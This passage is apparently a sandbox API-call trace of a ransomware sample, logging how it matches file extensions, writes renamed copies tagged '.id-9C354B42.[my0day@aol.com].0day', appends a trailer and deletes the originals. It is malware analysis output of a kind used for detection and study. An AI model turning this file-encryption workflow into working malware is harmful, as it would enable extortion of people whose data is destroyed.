lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=2209) returned 1 [0267.340] CloseHandle (hObject=0x2f8) returned 1 [0267.340] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg")) returned 0x20 [0267.340] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0267.340] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0267.340] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0267.340] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0267.340] lstrlenW (lpString=".doc") returned 4 [0267.340] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0267.340] lstrlenW (lpString=".docx") returned 5 [0267.340] lstrcmpiW (lpString1=".docx", lpString2="t.jpg") returned -1 [0267.340] lstrlenW (lpString=".pdf") returned 4 [0267.340] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0267.341] lstrlenW (lpString=".xls") returned 4 [0267.341] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0267.341] lstrlenW (lpString=".xlsx") returned 5 [0267.341] lstrcmpiW (lpString1=".xlsx", lpString2="t.jpg") returned -1 [0267.341] lstrlenW (lpString=".ppt") returned 4 [0267.341] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0267.341] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0267.341] lstrlenW (lpString=".zip") returned 4 [0267.341] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0267.341] lstrlenW (lpString=".rar") returned 4 [0267.341] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0267.341] lstrlenW (lpString=".bz2") returned 4 [0267.341] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0267.341] lstrlenW (lpString=".7z") returned 3 [0267.341] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0267.341] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0267.341] lstrlenW (lpString=".dbf") returned 4 [0267.341] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0267.341] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0267.341] lstrlenW (lpString=".1cd") returned 4 [0267.341] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0267.341] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0267.341] lstrlenW (lpString=".jpg") returned 4 [0267.341] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0267.341] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0267.341] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0267.341] lstrlenW (lpString=".doc") returned 4 [0267.342] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0267.342] lstrlenW (lpString=".docx") returned 5 [0267.342] lstrcmpiW (lpString1=".docx", lpString2="t.jpg") returned -1 [0267.342] lstrlenW (lpString=".pdf") returned 4 [0267.342] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0267.342] lstrlenW (lpString=".xls") returned 4 [0267.342] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0267.342] lstrlenW (lpString=".xlsx") returned 5 [0267.342] lstrcmpiW (lpString1=".xlsx", lpString2="t.jpg") returned -1 [0267.342] lstrlenW (lpString=".ppt") returned 4 [0267.342] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0267.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0267.342] lstrlenW (lpString=".zip") returned 4 [0267.342] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0267.342] lstrlenW (lpString=".rar") returned 4 [0267.342] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0267.342] lstrlenW (lpString=".bz2") returned 4 [0267.342] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0267.342] lstrlenW (lpString=".7z") returned 3 [0267.342] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0267.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0267.342] lstrlenW (lpString=".dbf") returned 4 [0267.342] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0267.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0267.342] lstrlenW (lpString=".1cd") returned 4 [0267.342] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0267.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0267.342] lstrlenW (lpString=".jpg") returned 4 [0267.342] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0267.343] lstrcmpiW (lpString1=".emf", lpString2=".0day") returned 1 [0267.343] lstrlenW (lpString="Month_Calendar.emf") returned 18 [0267.343] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0267.343] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=4192) returned 1 [0267.343] CloseHandle (hObject=0x2f8) returned 1 [0267.343] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf")) returned 0x20 [0267.343] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0267.343] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0267.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0267.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0267.343] lstrlenW (lpString=".doc") returned 4 [0267.343] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0267.343] lstrlenW (lpString=".docx") returned 5 [0267.343] lstrcmpiW (lpString1=".docx", lpString2="r.emf") returned -1 [0267.343] lstrlenW (lpString=".pdf") returned 4 [0267.343] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0267.343] lstrlenW (lpString=".xls") returned 4 [0267.343] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0267.343] lstrlenW (lpString=".xlsx") returned 5 [0267.343] lstrcmpiW (lpString1=".xlsx", lpString2="r.emf") returned -1 [0267.344] lstrlenW (lpString=".ppt") returned 4 [0267.344] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0267.344] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0267.344] lstrlenW (lpString=".zip") returned 4 [0267.344] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0267.344] lstrlenW (lpString=".rar") returned 4 [0267.344] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0267.344] lstrlenW (lpString=".bz2") returned 4 [0267.344] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0267.344] lstrlenW (lpString=".7z") returned 3 [0267.344] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0267.344] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0267.344] lstrlenW (lpString=".dbf") returned 4 [0267.344] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0267.344] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0267.344] lstrlenW (lpString=".1cd") returned 4 [0267.344] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0267.344] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0267.344] lstrlenW (lpString=".jpg") returned 4 [0267.344] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0267.344] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0267.344] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0267.344] lstrlenW (lpString=".doc") returned 4 [0267.344] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0267.344] lstrlenW (lpString=".docx") returned 5 [0267.344] lstrcmpiW (lpString1=".docx", lpString2="r.emf") returned -1 [0267.344] lstrlenW (lpString=".pdf") returned 4 [0267.344] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0267.344] lstrlenW (lpString=".xls") returned 4 [0267.344] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0267.344] lstrlenW (lpString=".xlsx") returned 5 [0267.344] lstrcmpiW (lpString1=".xlsx", lpString2="r.emf") returned -1 [0267.345] lstrlenW (lpString=".ppt") returned 4 [0267.345] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0267.345] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0267.345] lstrlenW (lpString=".zip") returned 4 [0267.345] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0267.345] lstrlenW (lpString=".rar") returned 4 [0267.345] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0267.345] lstrlenW (lpString=".bz2") returned 4 [0267.345] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0267.345] lstrlenW (lpString=".7z") returned 3 [0267.345] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0267.345] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0267.345] lstrlenW (lpString=".dbf") returned 4 [0267.345] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0267.345] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0267.345] lstrlenW (lpString=".1cd") returned 4 [0267.345] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0267.345] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0267.345] lstrlenW (lpString=".jpg") returned 4 [0267.345] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0267.345] lstrcmpiW (lpString1=".emf", lpString2=".0day") returned 1 [0267.345] lstrlenW (lpString="Music.emf") returned 9 [0267.345] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0267.346] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=26036) returned 1 [0267.346] CloseHandle (hObject=0x2f8) returned 1 [0267.346] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf")) returned 0x20 [0267.346] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0267.346] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0267.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67 [0267.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67 [0267.346] lstrlenW (lpString=".doc") returned 4 [0267.346] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0267.347] lstrlenW (lpString=".docx") returned 5 [0267.347] lstrcmpiW (lpString1=".docx", lpString2="c.emf") returned -1 [0267.347] lstrlenW (lpString=".pdf") returned 4 [0267.347] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0267.347] lstrlenW (lpString=".xls") returned 4 [0267.347] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0267.347] lstrlenW (lpString=".xlsx") returned 5 [0267.347] lstrcmpiW (lpString1=".xlsx", lpString2="c.emf") returned -1 [0267.347] lstrlenW (lpString=".ppt") returned 4 [0267.347] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0267.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67 [0267.347] lstrlenW (lpString=".zip") returned 4 [0267.347] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0267.347] lstrlenW (lpString=".rar") returned 4 [0267.347] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0267.347] lstrlenW (lpString=".bz2") returned 4 [0267.347] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0267.347] lstrlenW (lpString=".7z") returned 3 [0267.347] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0267.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67 [0267.348] lstrlenW (lpString=".dbf") returned 4 [0267.348] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0268.299] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.299] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0269.206] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=18304) returned 1 [0269.206] CloseHandle (hObject=0x2cc) returned 1 [0269.206] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf")) returned 0x20 [0269.206] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0x20 [0269.207] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.207] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0269.208] GetLastError () returned 0x0 [0269.208] ReadFile (in: hFile=0x2cc, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x5ec, lpOverlapped=0x0) returned 1 [0269.223] WriteFile (in: hFile=0x318, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x5f0, lpOverlapped=0x0) returned 1 [0269.224] ReadFile (in: hFile=0x2cc, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.224] WriteFile (in: hFile=0x318, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.224] SetEndOfFile (hFile=0x318) returned 1 [0269.224] CloseHandle (hObject=0x318) returned 1 [0269.224] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.224] SetEndOfFile (hFile=0x2cc) returned 1 [0269.228] CloseHandle (hObject=0x2cc) returned 1 [0269.228] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.238] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf")) returned 1 [0269.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0269.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0269.289] lstrlenW (lpString=".doc") returned 4 [0269.289] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.289] lstrlenW (lpString=".docx") returned 5 [0269.289] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.289] lstrlenW (lpString=".pdf") returned 4 [0269.289] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.289] lstrlenW (lpString=".xls") returned 4 [0269.289] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.289] lstrlenW (lpString=".xlsx") returned 5 [0269.289] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.289] lstrlenW (lpString=".ppt") returned 4 [0269.289] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0269.289] lstrlenW (lpString=".zip") returned 4 [0269.289] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.289] lstrlenW (lpString=".rar") returned 4 [0269.289] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.289] lstrlenW (lpString=".bz2") returned 4 [0269.289] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.289] lstrlenW (lpString=".7z") returned 3 [0269.289] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0269.289] lstrlenW (lpString=".dbf") returned 4 [0269.289] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0269.289] lstrlenW (lpString=".1cd") returned 4 [0269.289] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0269.289] lstrlenW (lpString=".jpg") returned 4 [0269.289] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0269.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0269.290] lstrlenW (lpString=".doc") returned 4 [0269.290] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.290] lstrlenW (lpString=".docx") returned 5 [0269.290] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.290] lstrlenW (lpString=".pdf") returned 4 [0269.290] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.290] lstrlenW (lpString=".xls") returned 4 [0269.290] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.290] lstrlenW (lpString=".xlsx") returned 5 [0269.290] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.290] lstrlenW (lpString=".ppt") returned 4 [0269.290] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0269.290] lstrlenW (lpString=".zip") returned 4 [0269.290] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.290] lstrlenW (lpString=".rar") returned 4 [0269.290] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.290] lstrlenW (lpString=".bz2") returned 4 [0269.290] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.290] lstrlenW (lpString=".7z") returned 3 [0269.290] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0269.290] lstrlenW (lpString=".dbf") returned 4 [0269.290] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0269.290] lstrlenW (lpString=".1cd") returned 4 [0269.290] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0269.290] lstrlenW (lpString=".jpg") returned 4 [0269.290] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.290] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.291] lstrlenW (lpString="BL00247_.WMF") returned 12 [0269.291] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0269.291] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=14444) returned 1 [0269.291] CloseHandle (hObject=0x300) returned 1 [0269.291] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf")) returned 0x20 [0269.291] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.291] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0269.291] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.291] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.291] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0269.293] GetLastError () returned 0x0 [0269.293] ReadFile (in: hFile=0x300, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x386c, lpOverlapped=0x0) returned 1 [0269.316] WriteFile (in: hFile=0x378, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x3870, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x3870, lpOverlapped=0x0) returned 1 [0269.321] ReadFile (in: hFile=0x300, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.321] WriteFile (in: hFile=0x378, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.321] SetEndOfFile (hFile=0x378) returned 1 [0269.321] CloseHandle (hObject=0x378) returned 1 [0269.321] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, 